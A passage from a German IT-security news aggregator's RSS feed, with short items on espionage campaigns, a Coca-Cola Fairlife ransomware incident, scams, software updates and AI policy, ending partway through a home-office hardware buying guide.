<a class="slashpop" href="http://twitter.com/home?status=As+AI+Transforms+Silicon+Valley%2C+Some+Tech+Workers+Face+Evaporating+Financial+Security%3A+https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F07%2F20%2F0212244%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F07%2F20%2F0212244%2Fas-ai-transforms-silicon-valley-some-tech-workers-face-evaporating-financial-security%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://it.slashdot.org/story/26/07/20/0212244/as-ai-transforms-silicon-valley-some-tech-workers-face-evaporating-financial-security?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mustang Panda missbraucht Zoho: 19.000 Dateien aus Atomkraftwerk - ad-hoc-news.de]]></title>
<description><![CDATA[Die Hacker-Kampagne GoSerpent stiehlt Geheimdokumente aus Regierungsnetzen. Parallel greifen Gruppen wie Mustang Panda indische Behörden an.]]></description>
<link>https://tsecurity.de/de/3680155/hacking/mustang-panda-missbraucht-zoho-19000-dateien-aus-atomkraftwerk-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680155/hacking/mustang-panda-missbraucht-zoho-19000-dateien-aus-atomkraftwerk-ad-hoc-newsde/</guid>
<pubDate>Mon, 20 Jul 2026 02:41:05 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die <b>Hacker</b>-Kampagne GoSerpent stiehlt Geheimdokumente aus Regierungsnetzen. Parallel greifen Gruppen wie Mustang Panda indische Behörden an.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware bei Coca-Cola Fairlife: US-Produktion pausiert und Systeme laufen im Restore]]></title>
<description><![CDATA[COOPERSVILLE (MICHIGAN) / LONDON (IT BOLTWISE) – Coca-Cola untersucht einen Ransomware-Angriff, der die Fairlife-Dairy-Einheit getroffen hat, und hat die US-Produktion an mehreren Standorten vorerst gestoppt. Laut SEC-Meldung prüft das Unternehmen noch Umfang und mögliche Auswirkungen auf den Bet...]]></description>
<link>https://tsecurity.de/de/3679811/it-security-nachrichten/ransomware-bei-coca-cola-fairlife-us-produktion-pausiert-und-systeme-laufen-im-restore/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679811/it-security-nachrichten/ransomware-bei-coca-cola-fairlife-us-produktion-pausiert-und-systeme-laufen-im-restore/</guid>
<pubDate>Sun, 19 Jul 2026 20:07:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cocacola-fairlife-ransomware-restore.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cocacola-fairlife-ransomware-restore.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cocacola-fairlife-ransomware-restore-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cocacola-fairlife-ransomware-restore-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cocacola-fairlife-ransomware-restore-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cocacola-fairlife-ransomware-restore-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-cocacola-fairlife-ransomware-restore-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">COOPERSVILLE (MICHIGAN) / LONDON (IT BOLTWISE) – Coca-Cola untersucht einen Ransomware-Angriff, der die Fairlife-Dairy-Einheit getroffen hat, und hat die US-Produktion an mehreren Standorten vorerst gestoppt. Laut SEC-Meldung prüft das Unternehmen noch Umfang und mögliche Auswirkungen auf den Betrieb. Fairlife betont, dass Qualität und Sicherheit der Produkte bislang nicht beeinträchtigt seien. Parallel arbeiten Sicherheits-Teams daran, Systeme […]</p>
<div><a href="https://www.it-boltwise.de/ransomware-bei-coca-cola-fairlife-us-produktion-pausiert-und-systeme-laufen-im-restore.html">... den vollständigen Artikel <strong>»Ransomware bei Coca-Cola Fairlife: US-Produktion pausiert und Systeme laufen im Restore«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/ransomware-bei-coca-cola-fairlife-us-produktion-pausiert-und-systeme-laufen-im-restore.html">Ransomware bei Coca-Cola Fairlife: US-Produktion pausiert und Systeme laufen im Restore</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GTA 6 ohne Disc: Retail-Box enthält nur Download-Code]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Rockstar startet die Vorbestellungen für „Grand Theft Auto 6“ und kündigt dabei einen überraschend diskreten Formfaktor an: Die physische Version kommt ohne Disc, sondern nur als Box mit Download-Code. Parallel dazu rückt das Pre-Loading-Setup näher, sobald November-Daten e...]]></description>
<link>https://tsecurity.de/de/3679798/it-security-nachrichten/gta-6-ohne-disc-retail-box-enthaelt-nur-download-code/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679798/it-security-nachrichten/gta-6-ohne-disc-retail-box-enthaelt-nur-download-code/</guid>
<pubDate>Sun, 19 Jul 2026 19:43:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gta6-disc-less-retail-code.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gta6-disc-less-retail-code.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gta6-disc-less-retail-code-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gta6-disc-less-retail-code-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gta6-disc-less-retail-code-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gta6-disc-less-retail-code-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gta6-disc-less-retail-code-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Rockstar startet die Vorbestellungen für „Grand Theft Auto 6“ und kündigt dabei einen überraschend diskreten Formfaktor an: Die physische Version kommt ohne Disc, sondern nur als Box mit Download-Code. Parallel dazu rückt das Pre-Loading-Setup näher, sobald November-Daten erreicht werden. Damit verschiebt sich der Kaufanreiz in Richtung Verfügbarkeit, Bundle-Bonus und Plattform-Ökosystem. Für […]</p>
<div><a href="https://www.it-boltwise.de/gta-6-ohne-disc-retail-box-enthaelt-nur-download-code.html">... den vollständigen Artikel <strong>»GTA 6 ohne Disc: Retail-Box enthält nur Download-Code«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/gta-6-ohne-disc-retail-box-enthaelt-nur-download-code.html">GTA 6 ohne Disc: Retail-Box enthält nur Download-Code</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11: Microsoft stoppt Treiber-Crash bei Dell-Laptops mit Notfall-Patch]]></title>
<description><![CDATA[Parallel zum Hardware-Notfall bestätigte Microsoft am 17. Juli eine Beeinträchtigung des Windows Server Update Services (WSUS). Der Dienst, der ...]]></description>
<link>https://tsecurity.de/de/3679735/windows-server/windows-11-microsoft-stoppt-treiber-crash-bei-dell-laptops-mit-notfall-patch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679735/windows-server/windows-11-microsoft-stoppt-treiber-crash-bei-dell-laptops-mit-notfall-patch/</guid>
<pubDate>Sun, 19 Jul 2026 18:01:42 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Parallel zum Hardware-Notfall bestätigte Microsoft am 17. Juli eine Beeinträchtigung des <b>Windows Server</b> Update Services (WSUS). Der Dienst, der ...]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp-Task-Scam und „Boss Scams“: FTC warnt vor Kryptofallen per Messenger]]></title>
<description><![CDATA[Parallel zur FTC-Warnung meldet das indische Cyber Crime ... Stichwörter Betrug Cybercrime Deepfake Konto Kryptowährung Microsoft Sicherheitsstrategie ...]]></description>
<link>https://tsecurity.de/de/3679428/it-security-nachrichten/whatsapp-task-scam-und-boss-scams-ftc-warnt-vor-kryptofallen-per-messenger/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679428/it-security-nachrichten/whatsapp-task-scam-und-boss-scams-ftc-warnt-vor-kryptofallen-per-messenger/</guid>
<pubDate>Sun, 19 Jul 2026 14:08:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Parallel zur FTC-Warnung meldet das indische <b>Cyber Crime</b> ... Stichwörter Betrug <b>Cybercrime</b> Deepfake Konto Kryptowährung Microsoft Sicherheitsstrategie ...]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp-Betrug: FTC warnt vor Task-Scam mit Kryptofalle - ad-hoc-news.de]]></title>
<description><![CDATA[Parallel dazu warnt das indische Cyber Crime Coordination Centre vor gefälschten Investment-Anzeigen auf Facebook und Instagram. Besonders dreist ...]]></description>
<link>https://tsecurity.de/de/3678840/it-security-nachrichten/whatsapp-betrug-ftc-warnt-vor-task-scam-mit-kryptofalle-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678840/it-security-nachrichten/whatsapp-betrug-ftc-warnt-vor-task-scam-mit-kryptofalle-ad-hoc-newsde/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Parallel dazu warnt das indische <b>Cyber Crime</b> Coordination Centre vor gefälschten Investment-Anzeigen auf Facebook und Instagram. Besonders dreist ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Cisco-Aktie: Stabil nach Quartalszahlen dank Software- und Security-Umsätzen - it boltwise]]></title>
<description><![CDATA[Regulatorisch und datenschutzseitig verschiebt sich der Fokus parallel zur Technologie: Netzwerke und Sicherheitslösungen sind nicht nur IT-Thema, ...]]></description>
<link>https://tsecurity.de/de/3678766/it-security-nachrichten/cisco-aktie-stabil-nach-quartalszahlen-dank-software-und-security-umsaetzen-it-boltwise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678766/it-security-nachrichten/cisco-aktie-stabil-nach-quartalszahlen-dank-software-und-security-umsaetzen-it-boltwise/</guid>
<pubDate>Sun, 19 Jul 2026 04:52:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Regulatorisch und datenschutzseitig verschiebt sich der Fokus parallel zur Technologie: Netzwerke und Sicherheitslösungen sind nicht nur <b>IT</b>-Thema, ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Data Visualisation: The Good, The Bad, The Ugly and the Beautiful (emf2026)]]></title>
<description><![CDATA[(Alt title - Look at this Graph: How to make Visualisations to be Proud of)

You probably encounter at least one data visualisation every day - whether that's in the news, in your own projects, or just scrolling through r/dataisugly. But what makes a visualisation good or bad?

Data visualisation...]]></description>
<link>https://tsecurity.de/de/3678709/it-security-video/data-visualisation-the-good-the-bad-the-ugly-and-the-beautiful-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678709/it-security-video/data-visualisation-the-good-the-bad-the-ugly-and-the-beautiful-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 03:31:59 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[(Alt title - Look at this Graph: How to make Visualisations to be Proud of)

You probably encounter at least one data visualisation every day - whether that's in the news, in your own projects, or just scrolling through r/dataisugly. But what makes a visualisation good or bad?

Data visualisation lets us leverage the powerful parallel processing abilities of our visual cognition system to understand data in an intuitive way. However, this system is also subject to bias, leaving us vulnerable to misunderstanding if the visualisation is designed poorly. As Tim Harford puts it, it is not always the &quot;ugly&quot; visualisations that are the most misleading, but the &quot;beautiful&quot;. 

In this talk I will discuss some classic dataviz rules of thumb, as well as newer research that may challenge these heuristics (spoiler alert: pie charts might not be as bad as you think!). I'll also discuss some ways you can make your own visualisations beautiful, interesting and trustworthy, using the R package ggplot2 as a worked example.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/241-data-visualisation-the-good-the-bad-the-ugly]]></content:encoded>
</item>
<item>
<title><![CDATA[Data Visualisation: The Good, The Bad, The Ugly and the Beautiful (emf2026)]]></title>
<description><![CDATA[(Alt title - Look at this Graph: How to make Visualisations to be Proud of)

You probably encounter at least one data visualisation every day - whether that's in the news, in your own projects, or just scrolling through r/dataisugly. But what makes a visualisation good or bad?

Data visualisation...]]></description>
<link>https://tsecurity.de/de/3678687/it-security-video/data-visualisation-the-good-the-bad-the-ugly-and-the-beautiful-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678687/it-security-video/data-visualisation-the-good-the-bad-the-ugly-and-the-beautiful-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 03:02:58 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[(Alt title - Look at this Graph: How to make Visualisations to be Proud of)

You probably encounter at least one data visualisation every day - whether that's in the news, in your own projects, or just scrolling through r/dataisugly. But what makes a visualisation good or bad?

Data visualisation lets us leverage the powerful parallel processing abilities of our visual cognition system to understand data in an intuitive way. However, this system is also subject to bias, leaving us vulnerable to misunderstanding if the visualisation is designed poorly. As Tim Harford puts it, it is not always the &quot;ugly&quot; visualisations that are the most misleading, but the &quot;beautiful&quot;. 

In this talk I will discuss some classic dataviz rules of thumb, as well as newer research that may challenge these heuristics (spoiler alert: pie charts might not be as bad as you think!). I'll also discuss some ways you can make your own visualisations beautiful, interesting and trustworthy, using the R package ggplot2 as a worked example.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/241-data-visualisation-the-good-the-bad-the-ugly]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic Logins, ClickFix-Lures und neue Ransomware-Risiken: CISO-Update]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Während Angreifer mit ClickFix- und Kill-Loop-Techniken Passwörter erzwingen und modularen Stealern hinterherlaufen, rückt bei Unternehmen gleichzeitig die Frage nach KI-sicheren Anmeldungen in den Vordergrund. 1Password koppelt bei „Agentic Mode“ Zugriffe an genehmigungspf...]]></description>
<link>https://tsecurity.de/de/3678532/it-security-nachrichten/agentic-logins-clickfix-lures-und-neue-ransomware-risiken-ciso-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678532/it-security-nachrichten/agentic-logins-clickfix-lures-und-neue-ransomware-risiken-ciso-update/</guid>
<pubDate>Sat, 18 Jul 2026 23:20:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clickfix-agentic-login-session.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clickfix-agentic-login-session.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clickfix-agentic-login-session-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clickfix-agentic-login-session-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clickfix-agentic-login-session-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clickfix-agentic-login-session-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-clickfix-agentic-login-session-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Während Angreifer mit ClickFix- und Kill-Loop-Techniken Passwörter erzwingen und modularen Stealern hinterherlaufen, rückt bei Unternehmen gleichzeitig die Frage nach KI-sicheren Anmeldungen in den Vordergrund. 1Password koppelt bei „Agentic Mode“ Zugriffe an genehmigungspflichtige, sitzungsbasierte Berechtigungen – ohne dass die KI den Klartext-Secret sieht. Parallel zeigen Daten zu Windows-10-Altlasten und schnell wachsenden KI-Rechenzentren, […]</p>
<div><a href="https://www.it-boltwise.de/agentic-logins-clickfix-lures-und-neue-ransomware-risiken-ciso-update.html">... den vollständigen Artikel <strong>»Agentic Logins, ClickFix-Lures und neue Ransomware-Risiken: CISO-Update«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/agentic-logins-clickfix-lures-und-neue-ransomware-risiken-ciso-update.html">Agentic Logins, ClickFix-Lures und neue Ransomware-Risiken: CISO-Update</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI fixes confusing ChatGPT Mac app with easier access to chats and Projects]]></title>
<description><![CDATA[OpenAI has released a new ChatGPT Mac app update that makes regular chats easier to find after users criticised the recent redesign. The company has now restored clearer access to Chat, Work, Codex, conversation history, and Projects inside the main window.



Last week, OpenAI replaced its previ...]]></description>
<link>https://tsecurity.de/de/3678060/ios-mac-os/openai-fixes-confusing-chatgpt-mac-app-with-easier-access-to-chats-and-projects/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678060/ios-mac-os/openai-fixes-confusing-chatgpt-mac-app-with-easier-access-to-chats-and-projects/</guid>
<pubDate>Sat, 18 Jul 2026 15:26:32 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI has released a new ChatGPT Mac app update that makes regular chats easier to find after users criticised the recent redesign. The company has now restored clearer access to Chat, Work, Codex, conversation history, and Projects inside the main window.



Last week, OpenAI replaced its previous native Mac client with a larger Electron-based app that combined ChatGPT, Codex, and the new Work agent. The company also renamed the older version ChatGPT Classic, which left many users confused about which app they should use.



The redesigned interface placed Codex and Work in a prominent menu, while standard ChatGPT opened through a smaller button in a floating window. That window also lacked direct access to existing chats and Projects, which quickly became the main complaint among Mac users.



Users shared their concerns on OpenAI’s Community forums and X, where they criticised the app’s layout and the reduced visibility of normal ChatGPT features. OpenAI executive Thibault Sottiaux later acknowledged the feedback and confirmed that the company would improve the interface.



Chat and Work now have a clearer layout



The latest update adds a visible toggle at the top of the window for switching between Chat and Work. A sidebar menu now lets users choose between regular ChatGPT and Codex, while chats and Projects are easier to access from the main interface.



The update addresses the most confusing parts of the redesign, although OpenAI may continue adjusting the app as more users test the unified Mac experience.]]></content:encoded>
</item>
<item>
<title><![CDATA[China's new World Artificial Intelligence Cooperation Organization is President Xi's clearest play yet for a parallel AI order]]></title>
<description><![CDATA[At the World AI Conference in Shanghai, Xi Jinping announced 5,000 AI training slots for Global South countries and the launch of the "World Artificial Intelligence Cooperation Organization." Cooperation centers with ASEAN, the African Union, BRICS, and other alliances are planned to follow. Chin...]]></description>
<link>https://tsecurity.de/de/3677872/ai-nachrichten/chinas-new-world-artificial-intelligence-cooperation-organization-is-president-xis-clearest-play-yet-for-a-parallel-ai-order/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677872/ai-nachrichten/chinas-new-world-artificial-intelligence-cooperation-organization-is-president-xis-clearest-play-yet-for-a-parallel-ai-order/</guid>
<pubDate>Sat, 18 Jul 2026 13:03:34 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://the-decoder.com/wp-content/uploads/2026/07/china_flag_visual-2.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        At the World AI Conference in Shanghai, Xi Jinping announced 5,000 AI training slots for Global South countries and the launch of the "World Artificial Intelligence Cooperation Organization." Cooperation centers with ASEAN, the African Union, BRICS, and other alliances are planned to follow. China is systematically building a parallel AI governance structure outside Western influence.</p>
<p>The article <a href="https://the-decoder.com/chinas-new-world-artificial-intelligence-cooperation-organization-is-president-xis-clearest-play-yet-for-a-parallel-ai-order/">China's new World Artificial Intelligence Cooperation Organization is President Xi's clearest play yet for a parallel AI order</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Homeoffice-Upgrade 2026: Diese Hardware lässt Sie wie ein Profi arbeiten]]></title>
<description><![CDATA[Das Homeoffice ist längst ein fester Bestandteil des Arbeitsalltags. Doch während Software und Cloud-Dienste ständig weiterentwickelt werden, arbeiten viele Nutzer noch immer an veralteten Schreibtischen, unbequemen Stühlen oder mit unpraktischen Monitor-Set-ups. Das kostet im besten Fall Zeit un...]]></description>
<link>https://tsecurity.de/de/3677691/it-nachrichten/homeoffice-upgrade-2026-diese-hardware-laesst-sie-wie-ein-profi-arbeiten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677691/it-nachrichten/homeoffice-upgrade-2026-diese-hardware-laesst-sie-wie-ein-profi-arbeiten/</guid>
<pubDate>Sat, 18 Jul 2026 10:33:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Das <a href="https://www.pcwelt.de/article/1188933/virtueller-pc-beruf-privat-trennen.html" target="_blank" rel="noreferrer noopener">Homeoffice</a> ist längst ein fester Bestandteil des Arbeitsalltags. Doch während Software und Cloud-Dienste ständig weiterentwickelt werden, arbeiten viele Nutzer noch immer an veralteten Schreibtischen, unbequemen Stühlen oder mit unpraktischen Monitor-Set-ups. Das kostet im besten Fall Zeit und Konzentration – im schlimmsten Fall geht es zulasten der Gesundheit.</p>



<p>2026 rückt deshalb die physische Arbeitsumgebung in den Fokus: Ergonomie, smarte Konnektivität und leistungsfähige Hardware entscheiden darüber, wie effizient, konzentriert und erfolgreich wir arbeiten. Schon gezielte Upgrades bei Monitoren, Eingabegeräten oder der Büroausstattung sorgen für spürbar mehr Komfort und einen deutlich besseren Workflow. Wir zeigen Ihnen die besten Hardware-Empfehlungen für ein modernes Homeoffice.</p>



<div class="ppl_wrap"><div class="top_head"><p class="pro_tag">PROMOTION</p><p><strong>Ihr Bildschirm wirkt blass? Dieses OLED-Display setzt neue Maßstäbe</strong></p></div><div class="ppl_row"><div class="pro_right promotion-item__image-outer-wrapper--small"><img decoding="async" class="promotion-item__image" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/HP-PPL-6.png" loading="lazy"></div><p class="ppl_text">
</p><p>Das HP OmniBook X Flip überzeugt mit einem farbstarken 3K-OLED-Touchdisplay und 120 Hz für die gestochen scharfe Darstellung von Text, Grafik und Video. Der Intel® Core™ Ultra 5 Prozessor mit Intel® Arc™ Grafik meistert Ihren Arbeitsalltag mühelos, während Thunderbolt™ 4 und Wi-Fi 7 für schnelle Verbindungen sorgen. Windows Hello per IR-Kamera macht die Anmeldung besonders komfortabel.</p>
</div><div class="clear-both"></div><div class="more_btn"><a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11348&amp;clickref=rss&amp;ued=https://www.notebooksbilliger.de/hp+omnibook+x+flip+14+fm0154ng+888634" target="_blank" class="promotion-view-deal-link" rel="noopener">Erfahren Sie mehr über das HP OmniBook X Flip</a></div></div>



<h2 class="wp-block-heading">Die wichtigsten Hardware-Upgrades für Ihr Homeoffice</h2>



<p>Um das Maximum aus Ihrem Arbeitstag herauszuholen, sollten Sie Ihre Ausstattung an den entscheidenden Stellen optimieren. Hier sind die besten Hardware-Tipps für Ihr Upgrade:</p>



<h2 class="wp-block-heading">Monitor: Dell U2724DE UltraSharp Thunderbolt 27 Zoll</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5b386f69d50"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Dell-U2724DE-UltraSharp-Thunderbolt-27-Zoll.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Dell U2724DE UltraSharp Thunderbolt 27 Zoll" class="wp-image-3153453" width="1200" height="1047" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Dell </p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0CNJSX8N8?tag=pcwelt.de-21&amp;ascsubtag=4-0-3153440-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3153440-7-0-0-0-0">Dell U2724DE bei Amazon ansehen</a></div>


<p>Preis: 552 Euro</p>



<p><strong>Technik:</strong></p>



<ul class="wp-block-list">
<li><strong>Bildschirmdiagonale &amp; Auflösung:</strong> 27 Zoll (68,58 cm) mit QHD-Auflösung (2560 x 1440 Pixel)</li>



<li><strong>Panel-Technologie:</strong> IPS Black mit nativem Kontrastverhältnis von 2.000:1 und 98 % DCI-P3 Farbraumabdeckung</li>



<li><strong>Bildwiederholrate:</strong> 120 Hz</li>



<li><strong>Ergonomie &amp; Sensoren:</strong> Umgebungslichtsensor (automatische Helligkeit/Farbtemperatur), ComfortView Plus (TÜV-zertifizierter Blaulichtfilter), höhenverstellbar, neigbar, schwenkbar, drehbar</li>



<li><strong>Video-Anschlüsse:</strong> 1 × HDMI, 2 × DisplayPort (Eingang und Ausgang für Daisy-Chaining)</li>



<li><strong>Konnektivität &amp; Docking:</strong> 2 × Thunderbolt 4 (inkl. Videosignal und Stromversorgung für Laptops), 2 × USB‑C, 4 × USB‑A Downstream, 1 × RJ45 Ethernet-Anschluss (2,5 Gbit/s)</li>



<li><strong>Herstellergarantie:</strong> 3 Jahre Premium-Panel-Austauschservice</li>
</ul>



<p>Der <a href="https://www.amazon.de/dp/B0CNJSX8N8?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Dell UltraSharp U2724DE</a> erweist sich im Test als extrem vielseitige Schaltzentrale für den modernen Arbeitsplatz. Das Alleinstellungsmerkmal in dieser Preisklasse ist das verbaute IPS-Black-Panel, das im Vergleich zu herkömmlichen IPS-Monitoren den Schwarzwert und das Kontrastverhältnis verdoppelt. </p>



<p>Damit schließt Dell die Lücke zu teuren OLED-Displays, ohne dass im harten Office-Alltag (etwa bei stundenlangen, statischen Excel-Tabellen) die Gefahr von Einbrenneffekten besteht. Die Bildwiederholrate von 120 Hz sorgt für flüssiges Scrollen durch Dokumente und macht das Display nach Feierabend auch Gaming-tauglich.</p>



<p>Ein echter Produktivitätsgewinn ist die integrierte Thunderbolt-4-Dockingstation mit schnellem 2,5G-Ethernet-Port: Ein einziges Kabel zum Laptop reicht aus, um das Gerät zu laden, das Bild zu übertragen und sämtliche Peripherie anzubinden. Über den Displayport-Ausgang lässt sich zudem ein zweiter Monitor in Reihe schalten (Daisy-Chaining). </p>



<p>Abgerundet wird das Modell durch einen präzisen Umgebungslichtsensor, der die Panel-Helligkeit schrittweise dem Raum anpasst und so die Augen bei langen Sessions schont. Als einziger Kompromiss bleibt die QHD-Auflösung – wer auf eine Pixeldichte von 4K besteht, muss in ein teureres Modell investieren.</p>



<p>Solche und andere Geräte finden Sie in unserer <a href="https://www.pcwelt.de/article/3041188/bester-monitor-test.html" target="_blank" rel="noreferrer noopener">Teststrecke der besten Monitore für Office, Gaming, 4K, HDR und mehr.</a></p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">Stuhl: Backforce One Plus</h2>


